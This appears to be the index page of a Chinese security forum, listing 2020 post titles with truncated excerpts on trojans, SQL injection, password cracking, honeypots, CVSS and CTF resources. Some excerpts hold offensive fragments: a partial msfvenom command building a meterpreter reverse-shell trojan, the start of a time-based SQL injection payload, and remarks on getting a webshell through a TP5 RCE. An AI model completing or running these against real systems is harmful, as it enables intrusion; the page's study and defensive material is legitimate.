HOLD社区 / 首页

  • 雨不会一直下,但一直会下雨
    雨不会一直下,但一直会下雨;没有人会永远爱你,但永远会有人爱你
    乔碧萝 / 2020-12-01

  • 记录php及其他语言利用msfvenom生成木马
    今天遇到了一个网站,通过冰蝎无法连接shell,算了干脆自己动手吧。Linux:msfvenom-plinux/x64/meterpreter/reverse_tcpLHOST=LPORT=-felf....
    乔碧萝 / 2020-11-28

  • linux的xargs使用
    例如:sudofind/usr/local-name名字|xargsrm-rxargs(英文全拼:eXtendedARGuments)是给命令传递参数的一个过滤器,也是组合多个命令的一个工具。xarg....
    轩子巨二兔 / 2020-11-25

  • phpinfo信息泄漏的思考
    tp5是存在rce的,phpinfo可以看一些敏感函数,system(),exec()等函数.我们这时候可以使用file_put_content()写shell来getshell,那么除了这个呢?根据....
    Fucker / 2020-11-25

  • 密码破解工具hydra
    https://github.com/vanhauser-thc/thc-hydra用法参考:https://blog.csdn.net/weixin_43510203/article/details....
    Fucker / 2020-11-24

  • 接下来将会写一个属于自己的弱口令爆破工具
    采用python,参考hydra.用来日天
    Fucker / 2020-11-24

  • CVSS评分
    CVSS:CommonVulnerabilityScoringSystem,即“通用漏洞评分系统”,是一个“行业公开标准,其被设计用来评测漏洞的严重程度,并帮助确定所需反应的紧急度和重要度”。它的主要....
    蔡徐坤 / 2020-11-24

  • sql时间注入学习
    今天测试公司的一个系统,遇到了时间注入,可是这个地方学习了忘记了,现在过来查漏补缺一下:要爆出数据库名肯定是需要知道长度的吧,不能一股脑乱来:1:爆数据库名称长度:1andif(length(data....
    乔碧萝 / 2020-11-20

  • xray与burpsuite联动
    xray与burp都是我觉得很猛的神器,但是两者都有缺陷,xray自动化高手动不足,burp手动足自动化不高。两者结合简直天下无敌。首先代理模式运行起来xray:./xray_darwin_amd64....
    ruimengmeng / 2020-11-12

  • 蜜罐
    SSH蜜罐:https://github.com/desaster/kippo蜜罐集合资源:https://github.com/paralax/awesome-honeypotskippo进阶版蜜罐....
    FreeWill / 2020-11-11

  • 甲方安全工程师生存指南
    web索引及日志搜索工具:https://github.com/thomaspatzke/WASE开源日志采集器:https://github.com/wgliang/logcool扫描CS结构的we....
    FreeWill / 2020-11-11

  • 各类CTF资源
    近年ctfwriteup大全:https://github.com/ctfs/write-ups-2016https://github.com/ctfs/write-ups-2015https://g....
    FreeWill / 2020-11-11